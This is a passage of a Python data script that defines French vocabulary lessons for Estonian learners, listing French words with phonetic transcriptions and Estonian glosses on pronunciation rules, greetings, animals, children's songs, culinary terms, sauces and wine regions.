""",ref="ill")
Reeglid.parse_words(None,u"""
# la bille [biije] : kuul
la anguille [A~'giije] : angerjas
la myrtille [mir'tiije] : mustikas
la famille [fa'miije] : perekond
la cuillère [kwi'jäär] : lusikas
# le pillage [pij'aaž] : rüüstamine
""")
Reeglid.parse_words(None,u"""
la ville [vil] : linn
mille [mil] : tuhat
le million [mil'jO~] : miljon
""")
#~ tranquille [trA~kiije] : rahulik
Reeglid.add_lesson(u"ail",
u"""
**ail** hääldatakse **[aj]** :
siin ei kehti reegel [ref ai], sest *i* sulab *l*-iga kokku.
""",ref="ail")
Reeglid.parse_words(Nom,u"""
l'ail (m) [aj] : küüslauk
le travail [tra'vaj] : töö
le détail [detaj] : detail
# l'aile (f) [ääl] : tiib
""")
Reeglid.parse_words(NomGeographique,u"""
Versailles [ver'sajə] : Versailles
""")
Reeglid.add_lesson(u'eil',
u"""
**eil** ja **eille** hääldatakse **[eij]**.
""",ref="eil")
Reeglid.parse_words(None,u"""
le réveil [re'veij] : äratuskell
le soleil [so'leij] : päike
la merveille [mär'veij] : ime
merveilleux [märvei'jöö] : imeline
# le réveillon [revei'jO~] : vana-aasta õhtu söök
la groseille [gro'zeij] : sõstar (punane v. valge) | tikker
# vieille (f) [vjeij] : vana
# la veille [veij] : pühalaupäev
""")
Reeglid.add_lesson(u"ueil",u"""
**ueil** hääldatakse **[Öj]**.
""",ref="ueil")
Reeglid.parse_words(None,u"""
le accueil [a'kÖj] : vastuvõtt
le orgueil [Or'gÖj] : ülbus
""")
Reeglid.add_lesson(u"euil",
u"""
**euil** hääldatakse **[Öj]**.
""",ref="euil")
Reeglid.parse_words(None,u"""
le chevreuil [šəv'rÖj] : metskits
le écureuil [ekü'rÖj] : orav
""")
if False:
Pronounciation.add_lesson(u"[äär]", u"""
Kui kuuled [äär], siis kirjutad kas **ère**, **aire**, **erre** või **er**.
""")
Pronounciation.parse_words(None,u"""
le père [päär] : isa
la paire [päär] : paar
le maire [määr] : linnapea
la mère [määr] : ema
la mer [määr] : meri
amer (m) [a'määr] : kibe
la bière [bjäär] : õlu
la pierre [pjäär] : kivi
la terre [täär] : muld
""")
if FULL_CONTENT:
Eestlastele.add_lesson(u"v ja f", u"""
Ettevaatust, **v** ei ole **f**!
""")
Eestlastele.parse_words(None,u"""
vous [vu] : teie
fou [fu] : hull
# vous êtes fous [vu'zäät fu] : te olete lollid
je veux [žə vöö] : ma tahan
le feu [föö] : tuli
la fille [fiij] : tüdruk | tütar
la vie [vii] : elu
la fin [fÄ~] : lõpp
le vin [vÄ~] : vein
""")
Eestlastele.add_lesson("gn ja ng", """
Ettevaatust, **gn** ei ole **ng**!
""")
Eestlastele.parse_words(Nom,u"""
le ange [A~ž] : ingel
le agneau [an'joo] : tall
le singe [sÄ~ž] : ahv
le signe ['sinjə] : märk
le linge [lÄ~ž] : pesu
la ligne ['linjə] : liin | rida
le songe [sO~ž] : unenägu
la besogne [bə'zOnjə] : ülesanne | kohustus
""")
Eestlastele.add_lesson(u"Sugu on oluline", u"""
Siin mõned näited, et sugu pole sugugi ebatähtis.
""")
Eestlastele.parse_words(Nom,u"""
le père [päär] : isa
la paire [päär] : paar
le maire [määr] : linnapea
la mère [määr] : ema
le tour [tuur] : tiir
la tour [tuur] : torn
le mur [müür] : sein | müür
la mûre [müür] : põldmari
le cours [kuur] : kursus | tund (koolis)
la cour [kuur] : õu, hoov | kohus
""")
#~ Eestlastele.parse_words(None,u"""
#~ court (m) [kuur] : lühike
#~ """)
Eestlastele.add_lesson(u"Ära aja segamini!", u"""
Mõned harjutused veel...
""")
Eestlastele.parse_words(Autre,u"""
ces ingrédients [säz Ä~gre'djA~] : need koostisained
c'est un crétin [sätÖ~ kre'tÄ~] : ta on kretiin
je dors [žə dOOr] : ma magan
j'ai tort [žee tOOr] : ma eksin
""")
Eestlastele.parse_words(Nom,u"""
la jambe [žA~mbə] : jalg
la chambre [šA~mbrə] : tuba
le agent [la' žA~] : agent
le chant [lə šA~] : laul
les gens [žA~] : inimesed, rahvas
les chants [šA~] : laulud
""")
if False:
Eestlastele.parse_words(None,u"""
le loup [lu] : hunt
la loupe [lup] : luup
la joue [žuu] : põsk
le jour [žuur] : päev
mou (m) [mu] : pehme
""")
#~ Reeglid.parse_words(NomPropre,u"""
#~ Winnetou [winə'tu] : (isegi maailmakuulsa apatši pealiku nime hääldavad prantslased valesti)
#~ """)
General.add_lesson(u"Tervitused", u"""
""")
General.parse_words(Autre,u"""
salut [sa'lü] : tervist
bonjour [bO~'žuur] : tere | head päeva | tere hommikust
bonsoir [bO~'swaar] : head õhtut
bonne nuit [bOnə 'nwi] : head ööd
au revoir [orə'vwaar] : nägemiseni
Monsieur [məs'jöö] : härra
Madame [ma'dam] : proua
Mademoiselle [madəmwa'zel] : preili
Comment t'appelles-tu? [ko'mA~ ta'päl tü] : Kuidas on sinu nimi?
Je m'appelle... [žə ma'päl] : Minu nimi on...
Comment vas-tu? [ko'mA~va'tü] : Kuidas sul läheb?
s'il vous plaît [silvu'plä] : palun (Teid)
s'il te plaît [siltə'plä] : palun (Sind)
merci [mer'si] : aitäh
merci beaucoup [mer'si bo'ku] : tänan väga
oui [wi] : jah
non [nO~] : ei
bon appétit [bOnappe'ti] : head isu
j'ai faim [žee fÄ~] : mul on kõht tühi
j'ai soif [žee swaf] : mul on janu
je suis fatigué [žə swi fati'gee] : ma olen väsinud
""")
if FULL_CONTENT:
General.add_lesson(u"Prantsuse automargid",columns=[FR,PRON],show_headers=False)
General.parse_words(NomPropre,u"""
Peugeot [pö'žo] : -
Citroën [sitro'än] : -
Renault [re'noo] : -
""")
General.add_lesson(u"Prantsuse eesnimed", u"""
""")
General.parse_words(NomPropre,u"""
Albert [al'bäär] : -
André [A~'dree] : Andre
Anne [anə] : Anne
Bernard [bär'naar] : -
Catherine [kat'rin] : Katrin
Charles [šarl] : Karl
François [frA~'swa] : -
Isabelle [iza'bäl] : Isabel
Jacques [žaak] : Jaak
Jean [žA~] : Jaan
Luc [lük] : Luukas
Marie [ma'rii] : Maria
Paul [pOl] : Paul
Philippe [fi'lip] : Filip
Pierre [pjäär] : Peeter
""")
General.add_lesson(u"Taluloomad", u"""
""")
General.parse_words(Nom,u"""
la chèvre ['šäävrə] : kits
la brebis [brə'bis] : lammas
le porc [pOOr] : siga
le cochon [ko'šO~] : siga
le cheval [šə'val] : hobune
la vache [vaš] : lehm
le taureau [to'roo] : pull
le veau [voo] : vasikas
le bœuf [bÖff] : härg
""")
General.add_lesson(u"Metsloomad", u"""
""")
General.parse_words(Nom,u"""
la chasse [šas] : jaht
le chasseur [ša'sÖÖr] : jahimees
le chevreuil [šəv'rÖj] : metskits
le cerf [säär] : hirv
la biche [biš] : emahirv
un élan [e'lA~] : põder
le lapin [la'pÄ~] : küülik
le lièvre [li'äävrə] : jänes
le renard [rə'naar] : rebane
un écureuil [ekü'rÖj] : orav
la souris [su'ri] : hiir
le blaireau [blä'roo] : mäger | habemeajamispintsel
le *hérisson [eri'sO~] : siil
la hermine [är'min] : hermeliin
la martre ['martrə] : nugis
la belette [bə'lät] : nirk
le loup [lu] : hunt
un ours [urs] : karu
le lynx [lÄ~ks] : ilves
le sanglier [sA~gli'e] : metssiga
le marcassin [marka'sÄ~] : metsseapõrsas
""")
# belette : nirk
if HAS_FUN and FULL_CONTENT:
Fun.add_lesson(u"Au clair de la lune", u"""
| Au clair de la lune,
| Mon ami Pierrot,
| Prête-moi ta plume
| Pour écrire un mot.
| Ma chandelle est morte,
| Je n'ai plus de feu ;
| Ouvre-moi ta porte,
| Pour l'amour de Dieu.
""")
Fun.parse_words(None,u"""
le clair de lune : kuuvalgus
un ami : sõber
""")
Fun.parse_words(Verbe,u"""
prêter : laenama
écrire : kirjutama
ouvrir : avama
""")
Fun.parse_words(None,u"""
la plume : sulg
""")
Fun.parse_words(Verbe,u"""
""")
Fun.parse_words(None,u"""
le mot : sõna
la chandelle : küünlalamp
""")
Fun.parse_words(Adjectif,u"""
mort | morte (adj.) : surnud
""")
Fun.parse_words(None,u"""
le feu [föö] : tuli
la porte [pOrt] : uks
un amour : armastus
Dieu : Jumal
""")
if HAS_FUN:
Fun.add_lesson(u"Sur le pont d'Avignon", u"""
| Sur le pont d'Avignon,
| on y danse, on y danse ;
| Sur le pont d’Avignon,
| on y danse tous en rond !
|
| Les beaux messieurs font comme ça,
| et puis encore comme ça.
|
| Les belles dames font comme ça,
| et puis encore comme ça.
|
| Les cordonniers font comme ça,
| et puis encore comme ça.
""")
Fun.parse_words(None,u"""
sur : peal
le pont [pO~] : sild
on danse tous ['dA~sə] : me kõik tantsime
en rond : ringis
les beaux messieurs : ilusad härrad
les belles dames : ilusad daamid
ils font [il fO~] : nad teevad
comme ci [kOm'si] : niimoodi
comme ça [kOm'sa] : naamoodi
et puis encore [e pwi A~'kOOr] : ja siis veel
le cordonnier [kOrdon'jee] : kingsepp
""")
if HAS_FUN and FULL_CONTENT:
Fun.add_lesson(u"J'ai du bon tabac", u"""
| J'ai du bon tabac dans ma tabatière,
| J'ai du bon tabac, tu n'en auras pas.
| J'en ai du fin et du bien râpé
| Mais, ce n'est pas pour ton vilain nez
| J'ai du bon tabac dans ma tabatière
| J'ai du bon tabac, tu n'en auras pas
""")
if FULL_CONTENT:
General.add_lesson(u"Linnud", u"""
""")
General.parse_words(Nom,u"""
le oiseau [wa'zoo] : lind
la poule [pul] : kana
le poulet [pu'lä] : tibu | kanapoeg
la oie [wa] : hani
le dindon [dÄ~dO~] : kalkun
la dinde [dÄ~də] : emakalkun
le pigeon [pi'žO~] : tuvi
""")
Kokadele.add_lesson(u"Katame lauda!", u"""
""")
Kokadele.parse_words(Nom,u"""
la table ['taablə] : laud
la chaise [šääz] : tool
le couteau [ku'too] : nuga
la fourchette [fur'šet] : kahvel
la cuillère [kwi'jäär] : lusikas
les couverts [ku'väär] : noad-kahvlid
la assiette [as'jät] : taldrik
le bol [bOl] : joogikauss
le verre [väär] : klaas
la tasse [tas] : tass
le plat [pla] : kauss
""")
Kokadele.add_lesson(u"Joogid", u"""""")
Kokadele.parse_words(Nom,u"""
la boisson [bwa'sO~] : jook
la bière [bjäär] : õlu
la eau [oo] : vesi
le jus [žu] : mahl
le café [ka'fee] : kohv
le thé [tee] : tee
le vin rouge [vÄ~ 'ruuž] : punane vein
le vin blanc [vÄ~ 'blA~] : valge vein
le vin rosé [vÄ~ ro'zee] : roosa vein
le cidre ['siidrə] : siider
la région [rež'jO~] : regioon, ala
le terroir [ter'waar] : geograafiline veinirühm
la appellation d'origine contrôlée (AOC) [apela'sjO~ dori'žin kO~trO'lee] : kontrollitud päritolumaa nimetus
la bavaroise [bavaru'aaz] : jook teest, piimast ja liköörist
""")
Kokadele.add_lesson(u"Menüü", intro=u"""""")
Kokadele.parse_words(Nom,u"""
le plat [pla] : roog
le plat du jour [pla dü žuur] : päevapraad
le *hors d'œuvre [OOr 'dÖÖvrə] : eelroog
le dessert [des'säär] : magustoit
""")
Kokadele.add_lesson(u"Supid", u"""
""")
Kokadele.parse_words(Nom,u"""
la soupe [sup] : supp
le potage [po'taaž] : juurviljasupp
le potage purée [po'taažə pü'ree] : püreesupp
le velouté [vəlu'tee] : koorene püreesupp
le velouté Dubarry [vəlu'tee düba'ri] : koorene püreesupp lillkapsaga
le bouillon [bui'jO~] : puljong
le consommé [kO~som'mee] : selge puljong
le consommé de volaille [kO~som'mee də vo'lajə] : linnulihast puljong
le consommé de gibier [kO~som'mee də žib'jee] : ulukilihast puljong
le consommé de poisson [kO~som'mee də pwa'sO~] : kala puljong
le consommé double [kO~som'mee 'duublə] : kahekordne puljong
#rammuleem?
""")
Kokadele.add_lesson(u"Liha", u"""
""")
Kokadele.parse_words(Nom,u"""
la viande [vjA~də] : liha
la volaille [vo'lajə] : linnuliha
le poulet [pu'lä] : kana
le gibier [žibiee] : jahiloomad
la boucherie [bušə'rii] : lihakauplus, lihakarn
le lard [laar] : pekk
le jambon [žA~'bO~] : sink
la saucisse [soo'sis] : vorst
la graisse [gräs] : rasv
le os [os] : kont
la côte [koot] : ribi
le dos [do] : selg
la cuisse [kwis] : kints
la langue [lA~gə] : keel
le foie [fwa] : maks
les tripes [trip] : soolestik
le cœur [kÖÖr] : süda
le rognon [ron'jO~] : neer (kulin.)
la cervelle [ser'vell] : aju
les abats [a'ba] : subproduktid (maks, süda, neerud, keel, jalad)
""")
Kokadele.add_lesson(u"Kala", u"""
""")
Kokadele.parse_words(Nom,u"""
le poisson [pwa'sO~] : kala
les crustacés [krüsta'see] : karploomad | koorikloomad
le brochet [bro'šä] : haug
la anguille [A~'giijə] : angerjas
la perche [pärš] : ahven
le *hareng [ar'A~] : heeringas
le sprat [sprat] : sprot
le thon [tO~] : tuunikala
le requin [rə'kÄ~] : haikala
""")
Kokadele.add_lesson(u"Liharoad", u"""""")
Kokadele.parse_words(Nom,u"""
la escalope [eska'lOp] : eskalopp, šnitsel
le ragoût [ra'gu] : raguu
la roulade [ru'laadə] : rulaad
la paupiette [pop'jät] : liharull
le aspic [as'pik] : sült
le filet [fi'lä] : filee | võrk
le bifteck [bif'täk] : biifsteek
la brochette [bro'šät] : lihavarras, šašlõk
les attereaux [attə'roo] : fritüüris praetud varras, paneeritud šašlõk
la côtelette [kot'lät] : naturaalne kotlet
la côtelette de porc [kot'lät də pOOr] : sealiha kotlet
la noisette de porc [nwa'zät də pOOr] : filee sealiha
le goulasch [gu'laš] : guljašš
le *hachis [ha'ši] : hakkliha
la boulette [bu'lett] : lihapall
le tournedos [turnə'do] : veise sisefilee portsjon toode
la entrecôte [A~trə'koot] : antrekoot
le Chateaubriand [šatobri'A~] : praetud liharoog
le carré d'agneau [ka'ree dan'joo] : praetud tallerind
la poitrine d'agneau farcie [pwa'trin dan'joo far'sii] : täidetud tallerind
le cœur de filet [kÖÖr də fi'lä] : veise sisefilee
le filet mignon [fi'lä min'jO~] : veise sisefilee portsjon toode
le filet médaillon [fi'lä meda'jO~] : medaljon (veise sisefilee portsjon toode)
le médaillon de veau [meda'jO~ də'voo] : vasika medaljon
le bœuf bourguignon [bÖff burgin'jO~] : härjapraad burgundia veiniga
le bœuf à la tartare [bÖff a la tar'taar] : väiketükiline toode sisefileest
le bœuf à la Strogonov [bÖff a la strogo'nov] : böfstrogonov
le sauté de bœuf à la suédoise [so'tee də bÖff a la süee'dwaazə] : klopsid
le sauté de veau [so'tee də voo] : pajaroog vasikalihast
la selle de mouton [säl də mu'tO~] : lamba (talle) sadul
""")
Kokadele.add_lesson(u"Road", intro=u"""""")
Kokadele.parse_words(Nom,u"""
la purée [pü'ree] : püree
le œuf [Öf] : muna
les œufs brouillés [öö brui'jee] : omlett
les œufs pochés [öö po'šee] : ilma kooreta keedetud muna
le gratin [gra'tÄ~] : gratään (ahjus üleküpsetatud roog)
le gratin dauphinois [gra'tÄ~ dofinw'a] : (tuntud retsept)
le gratin savoyard [gra'tÄ~ savwa'jaar] : (juustuga gratin dauphinois)
le soufflé [suff'lee] : suflee
la quiche lorraine [kiš lo'rään] : quiche
la pâte brisée [paat bri'zee] : (Mürbeteig, shortcrust pastry)
la tourte [turt] : (ingl. *pie*)
la fondue [fO~'düü] : fondüü
le fumet [fü'mä] : hea lõhn (nt. veini, liha kohta)
le pâté [pa'tee] : pasteet
le pâté en croûte [pa'tee A~'krut] : küpsetatud taignas pasteet
le pâté en terrine [pa'tee A~ter'rin] : küpsetatud pasteet kausis
la galantine [galA~'tin] : galantiin
le cassoulet [kasu'lä] : Languedoc'ist pärit ühepajatoit ubadest ja lihast, mida küpsetatakse mitu tundi madala temperatuuriga ahjus.
le pot-au-feu [poto'föö] : ühepajatoit
""")
Kokadele.add_lesson(u"Juust", u"""""")
Kokadele.parse_words(None,u"""
le fromage [fro'maaž] : juust
la caillebotte [kajə'bott] : (kodujuust)
la raclette [rak'lett] : kuumaga sulatud juust
le Camembert [kamA~'bäär] : (valgehallitusjuust)
le Emmental [emən'taal] : suurte augudega kõva juust
le Roquefort [rOk'fOOr] : (sinihallitusjuust)
le Gruyère [grüi'jäär] : -
le Edam [e'dam] : -
le Brie [brii] : -
le Parmesan [parmə'zA~] : -
""")
Kokadele.add_lesson(u"Magustoidud", u"""""")
Kokadele.parse_words(Nom,u"""
le dessert [des'säär] : magustoit
la crème [krääm] : koor
la crème fraiche [krääm 'fräš] : rõõsk koor
la crème brûlée [krääm brü'lee] : põletatud koor
la crème bavaroise [krääm bavaru'aaz] : muna-piima-seguga kreem želatiiniga
la sauce melba [soos mel'ba] : melba kaste
la sauce vanille [soos va'niijə] : vanillikaste
la sauce caramel [soos kara'mäl] : karamellkaste
la crêpe [kräp] : pannkook
la glace [glass] : jäätis
le sorbet [sor'bä] : jäätis (ilma kooreta)
le parfait [par'fä] : parfee
le gâteau [ga'too] : kook
la gaufre ['goofrə] : vahvel
la tarte [tart] : tort
la compote [kO~'pOt] : kompott
la gelée [žə'lee] : tarretis
la confiture [kO~fi'tüür] : moos | keedis
la mousse [mus] : vaht
la tarte aux prunes [tarto'prün] : ploomikook
la salade de fruits [sa'laad də frü'i] : puuviljasalat
la salade de baies [sa'laad də bä] : marjasalat
le petit-beurre [pəti'bÖÖr]: (kuiv küpsis)
""")
Kokadele.add_lesson(u"Puuviljad", u"""""")
Kokadele.parse_words(Nom,u"""
le fruit [frü'i] : puuvili
le ananas [ana'na] : ananass
la banane [ba'nan] : banaan
le citron [si'trO~] : sidrun
la orange [o'rA~ž] : apelsin
la pomme [pom] : õun
la poire [pu'aar] : pirn
la prune [prünn] : ploom
la cerise [sə'riiz] : kirss
la noix [nwa] : pähkel
la noisette [nwa'zett] : sarapuupähkel
""")
Kokadele.add_lesson(u"Marjad", u"""""")
Kokadele.parse_words(Nom,u"""
la baie [bä] : mari
la fraise [frääz] : maasikas
la myrtille [mir'tiijə] : mustikas
la mûre [müür] : põldmari
la groseille [gro'zeijə] : sõstar (punane v. valge) | tikker
le cassis [ka'sis] : mustsõstar
""")
Kokadele.add_lesson(u"Juurviljad", u"""""")
Kokadele.parse_words(Nom,u"""
le légume [le'güm] : juurvili
la pomme de terre [pom də 'täär] : kartul
la tomate [to'mat] : tomat
la carotte [ka'rOt] : porgand
# la betterave []
# le panais
# le radis
# le salsifis
# le cerfeuil
la asperge [as'pärž] : spargel
le épinard [epi'naar] : spinat
le concombre [kO~kO~brə]: kurk
le *haricot [ari'ko] : uba
la salade [sa'laadə] : salat
la endive [A~'diiv] : endiiv
# le chicon [ši'kO~] :
le chou [šu] : kapsas
le chou-fleur [šu 'flÖÖr] : lillkapsas
""")
Kokadele.add_lesson(u"Teraviljad", u"""""")
Kokadele.parse_words(Nom,u"""
le blé [blee] : teravili
la avoine [avu'ann] : kaer
le froment [fro'mA~] : nisu
le sarrasin [sara'zÄ~] : tatar
le blé noir [blee'nwaar] : tatar
le riz [ri] : riis
le seigle ['sääglə] : rukis
le orge ['Oržə] : oder
""")
Kokadele.add_lesson(u"Teraviljatooded", u"""""")
Kokadele.parse_words(Nom,u"""
le riz pilaf [ri pi'laf] : pilaff
les pâtes ['paat] : pastaroad
la farine [far'in] : jahu
la bouillie [bui'jii] : puder
le gruau [grü'oo] : puder
le pain [pÄ~] : sai | leib
la tartine [tar'tin] : võileib
la baguette [ba'gät] : prantsuse pikk sai
le croustillon [krusti'jO~] : õlis praetud kohupiimapall
le crouton [kru'tO~] : krutoon
""")
Kokadele.add_lesson(u"Koostisosad", u"""""")
Kokadele.parse_words(Nom,u"""
le ingrédient [Ä~gre'djA~] : koostisosa
le lait [lä] : piim
le beurre [bÖÖr]: või
la crème [kr'ääm] : kreem | koor
le sucre ['sükrə] : suhkur
le sel [säl] : sool
le poivre ['pwaavrə] : pipar
""")
Kokadele.add_lesson(u"Ürdid", u"""""")
Kokadele.parse_words(Nom,u"""
le assaisonnement [asäzon'mA~] : maitsestamine
le condiment [kO~di'mA~] : maitseaine
la épice [e'pis] : vürts
les fines herbes [fin'zärbə] : fines herbes ("peened ürdid")
une herbe [ärbə] : ürt
le persil [pär'sil] : petersell
le céléri [sele'ri] : seller
la gousse d'ail [guss 'daij] : küüslaugu küün
l'ail (m) [aj] : küüslauk
un oignon [on'jO~] : sibul
la ciboulette [sibu'lät] : murulauk
la câpre ['kaaprə] : kappar
le gingembre [žÄ~žA~brə] : ingver
""")
Kokadele.add_lesson(u"Köögis", u"""""")
Kokadele.parse_words(Nom,u"""
la cuisine [kwi'zin] : köök
la cuisinière [kwizin'jäär] : pliit
le four [fuur] : ahi
le four à micro-ondes [fuur a mikro 'O~də] : mikrolaine ahi
le moulin [mu'lÄ~] : veski
le congélateur [kO~gela'tÖÖr] : külmutuskapp
un évier [evi'ee] : kraanikauss
la armoire [arm'waar] : kapp
le placard [pla'kaar] : seinakapp
""")
Kokadele.add_lesson(u"Köögiriistad", u"""""")
Kokadele.parse_words(Nom,u"""
le fouet [fu'ä] : vispel
la louche [lušə] : kulp
la allumette [alü'mätə] : tuletikk
la coquille [ko'kiijə] : merekarp
la cocotte [ko'kot] : malmkastrul, kokott
la poêle [pwal] : pann
la râpe [rap] : riiv
la casserole [kas'roll] : kastrul
la russe [rüs] : kastrul
la marmite [mar'mit] : katel
la braisière [bräz'jäär] : pott smoorimiseks
le caquelon [kak'lO~] : fondüüpott
le bain-marie [bÄ~ma'rii] : veevann
la passoire [pas'waar] : sõel
""")
Kokadele.add_lesson(u"Mida kokk teeb", intro=u"""
""")
Kokadele.parse_words(Verbe,u"""
préparer [prepa'ree] : ette valmistama
# composer [kO~po'zee] : koostama
# baisser [bäs'see] : alla laskma, madaldama
# porter [por'tee] : kandma
laver [la'vee] : pesema
concasser [kO~kas'see] : peenestama (tükkideks)
farcir [far'siir] : farssima (täidisega täitma)
*hacher [a'šee] : hakkima
éplucher [eplü'šee] : koorima
émincer [emÄ~'see] : lõikama viiludeks
tourner [tur'nee] : keerama, pöörama
# utiliser [ütili'zee] : kasutama
préchauffer [prešoo'fee] : ette kütma
""")
Kokadele.add_lesson(u"Pliidil", u"""""")
Kokadele.parse_words(Nom,u"""
la cuisson [küis'sO~] : keetmine
le blanchiment [blA~ši'mA~] : blanšeerimine
le rôtissage [rotis'saaž] : praadimine (panni peal)
le rissolement [risol'mA~] : praadimine
la friture [fri'tüür] : friipraadimine (õlis või rasvas)
le grillage [gri'jaaž] : röstimine
le braisage [bre'zaaž] : smoorimine
""")
#~ le bain marie [bÄ~ ma'rii] :
Kokadele.parse_words(Verbe,u"""
cuire [kwiir] : keetma
blanchir [blA~'šiir] : blanšeerima
rôtir [ro'tiir] : praadima (panni peal)
rissoler [risso'lee]: (rasvas) pruunistama
frire [friir] : praadima (õlis)
griller [gri'jee] : röstima
braiser [brä'zee] : smoorima
""")
if FULL_CONTENT:
General.add_lesson(u"Linnad prantsusmaal",columns=[GEON("Linn"), GEOM, GEOF])
General.parse_words(NomGeographique,u"""
Avignon [avin'jO~] | avignonnais [avinjo'nä] | avignonnaise [avinjo'nääz] : -
Bordeaux [bor'doo] | bordelais [bordə'lä] | bordelaise [bordə'lääz] : -
Bourgogne [burgOnjə] | bourguignon [burgin'jO~] | bourguignonne [burgin'jOnn] : -
Dijon [di'žO~] | dijonnais [dižon'nä] | dijonnaise [dižon'nääz] : -
Lyon [li'O~] | lyonnais [lio'nä] | lyonnaise [lio'nääzə] : -
Marseilles [mar'säijə] | marseillais [marsäi'jä]| marseillaise [marsäi'jääz] : -
Paris [pa'ri] | parisien [pariz'jÄ~]| parisienne [pariz'jän] : Pariis
Reims [rÄ~s] | rémois [rem'wa]| rémoise [rem'waaz] : Reims
Verdun [vär'dÖ~] | verdunois [värdü'nwa]| verdunoise [värdü'nwaaz] : -
Versailles [ver'saj] | versaillais [värsa'jä] | versaillaise [värsa'jääz] : -
""")
#~ Vocabulary.parse_words(NomGeographique,u"""
#~ la France [frA~s] : Prantsusmaa
#~ la Belgique [bel'žik] : Belgia
#~ une Allemagne [al'manjə] : Saksamaa
#~ une Angleterre [A~glə'täär] : Inglismaa
#~ une Estonie [ästo'nii]: Eesti
#~ une Hollande [o'lA~də]: holland
#~ une Espagne [es'panjə]: hispaania
#~ une Italie [ita'lii]: hispaania
#~ """)
#~ Vocabulary.parse_words(Adjectif,u"""
#~ français [frA~'sä] | français [frA~'sääz] : prantsuse
#~ estonien [esto'njÄ~] | estonien [esto'njän] : eesti
#~ espagnol [espan'jol] | espagnole [espan'jol] : hispaania
#~ hollandais [olA~'dä] | hollandaise [olA~'dääz]: holandi
#~ """)
Kokadele.add_lesson(u"Omadussõnad (kulinaaria)", intro=u"""
Selliseid omadussõnu leidub erinevates kulinaaria väljundites.
""",columns=[M, F, ET])
Kokadele.parse_words(Adjectif,u"""
beurré [bÖÖ'ree] | beurrée [bÖÖ'ree]: võiga
braisé [brä'zee] | braisée [brä'zee] : smooritud
coupé [ku'pee] | coupée [ku'pee] : lõigatud
épicé [epi'see] | épicée [epi'see] : vürtsitatud, vürtsikas
glacé [glas'see] | glacée [glas'see] : jäätunud
haché [a'šee] | hachée [a'šee] : hakkitud
manié [man'jee] | maniée [man'jee] : käsitletud
poché [po'šee] | pochée [po'šee] : uputatud keeva vette
rissolé [riso'lee] | rissolée [riso'lee] : (rasvas) pruunistatud
sauté [soo'tee] | sautée [soo'tee] : rasvas praetud
velouté [velu'tee] | veloutée [velu'tee] : sametine, sametitaoline
bouilli [bui'ji] | bouillie [bui'jii] : keedetud
croustillant [krusti'jA~] | croustillante [krusti'jA~t] : krõbe
piquant [pi'kA~] | piquante [pi'kA~t] : terav
gourmand [gur'mA~] | gourmande [gur'mA~d] : maiasmokk
paysan [pei'zA~] | paysanne [pei'zann] : talu-, talupoja-
royal [rwa'jal] | royale [rwa'jal] : kuninglik
suprême (mf) [sü'prääm] : ülem, kõrgem, ülim
""")
Kokadele.add_lesson(u"Kastmete valmistamine", intro=u"""""")
Kokadele.parse_words(Nom,u"""
la sauce [soos] : kaste
la moutarde [mu'tardə] : sinep
le vinaigre [vin'äägrə] : äädikas
la mayonnaise [majo'nääz] : majonees
la vinaigrette [vine'grät] : vinegrett
le beurre manié [bÖÖr man'jee]: jahuvõi
le roux [ru] : rasvas kuumutatud jahu
le roux blanc [ru blA~] : valge segu
le roux blond [ru blO~] : kollane segu
le roux brun [ru brÖ~] : pruun segu
la sauce espagnole [espan'jOl] : pruun põhikaste
la sauce demi-glace [dəmi'glas] : redutseeritud pruun põhikaste
le jus de rôti [žu də ro'ti] : redutseeritud puljong, "praeliha mahl"
le jus lié [žu li'ee] : maisi või nooljuurejahuga pruun kaste
le mirepoix [mirə'pwa] : praetud kuubikud (sibul, porgand, seller)
la coupe en dés [kup A~ 'dee] : lõikamine kuubikuteks
la coupe en brunoise [kup A~ brün'waaz] : juurvilja lõikamine kuubikuteks (2mm)
la coupe julienne [kup jül'jän] : juurvilja lõikamine ribadeks (2mm)
la coupe jardinière [kup žardin'jäär] : juurvilja lõikamine ribadeks
la coupe à la paysanne [kup ala päi'zan] : juurvilja lõikamine ketasteks
""")
Kokadele.add_lesson(u"Kastmed", intro=u"""""")
Kokadele.parse_words(Nom,u"""
la sauce paysanne [pei'zan] : talupoja kaste
la sauce chasseur [ša'sÖÖr] : jahimehe kaste
la sauce jardinière [žardin'jäär] : aedniku kaste
la sauce piquante [pi'kA~tə] : pikantne kaste
la sauce poivrade [pwav'raadə] : piprakaste
la sauce Grand Veneur [grA~ və'nÖÖr] : jäägri kaste
la sauce Bigarrade [biga'raadə] : apelsinikaste
la sauce smitane [smi'tanə] : hapukoorekaste
la sauce Lyonnaise [lio'nääzə] : pruun sibulakaste
la sauce Bourguignonne [burgin'jOn] : Burgundia kaste
la sauce Robert [ro'bäär] : Roberti kaste
la sauce Madère [ma'däär] : Madeira kaste
la sauce Mornay [mOr'nä] : juustukaste
la sauce Porto [pOr'to] : portveini kaste
la sauce Sabayon [saba'jO~] : Sabayon-kaste
la sauce italienne [ital'jän] : itaalia kaste
la sauce veloutée [vəlu'tee] : hele põhikaste
la sauce blanche [blA~šə] : tuletatud hele kaste
la sauce bordelaise [bOrdə'lääz] : punase veini kaste
la sauce béarnaise [bear'nääz] : bernoo kaste
la sauce béchamel [beša'mäl] : valge põhikaste
la sauce aurore [o'rOOr] : aurorakaste
la sauce Choron [šo'rO~] : choronkaste
la sauce Foyot [fwa'jo] : foyotkaste
la macédoine [mase'dwan] : juurviljasalat
""")
Kokadele.add_lesson(u"Veinialad Prantsusmaal", u"""
""",columns=[FR,PRON])
Kokadele.parse_words(NomGeographique,u"""
Alsace [al'zas] : Elsass
Beaujolais [boožo'lä] : -
Bordeaux [bOr'doo] : -
Bourgogne [bur'gonjə] : -
Champagne [šA~'panjə] : -
Charente [ša'rA~tə] : -
Poitou [pwa'tu] : -
Corse ['korsə] : Korsika
Jura [žü'ra] : -
Savoie [savu'a] : -
Languedoc [lA~gə'dok] : -
Roussillon [russi'jO~] : -
Provence [pro'vA~sə] : -
Sud-Ouest [süd'uest] : -
Gascogne [gas'konjə] : -
Val de Loire [val də 'lwaarə] : Loire'i org
Vallée du Rhône [val'lee dü roonə] : Rhône'i org
""")
Kokadele.add_lesson(u"Prantsuse veinid", u"""
Prantsuse veinid on üle 400, siin ainult mõned.
""",columns=[FR,PRON])
Kokadele.parse_words(Nom,u"""
le Chasselas [šas'la] : -
le Grand Cru [grA~'krü] : -
le Pinot Noir [pi'no nwaar] : -
la Côte de Brouilly [koot də bru'ji] : -
le Saint-Amour [sÄ~ta'muur] : -
le Bordeaux clairet [bOr'doo klä'rä] : -
le Médoc [me'dok] : -
le Saint-Émilion [sÄ~temi'jO~] : -
la Côte de Beaune [koot də boon] : -
les Côtes du Ventoux [kootə dü vA~'tu] : -
le Minervois [minerv'wa] : -
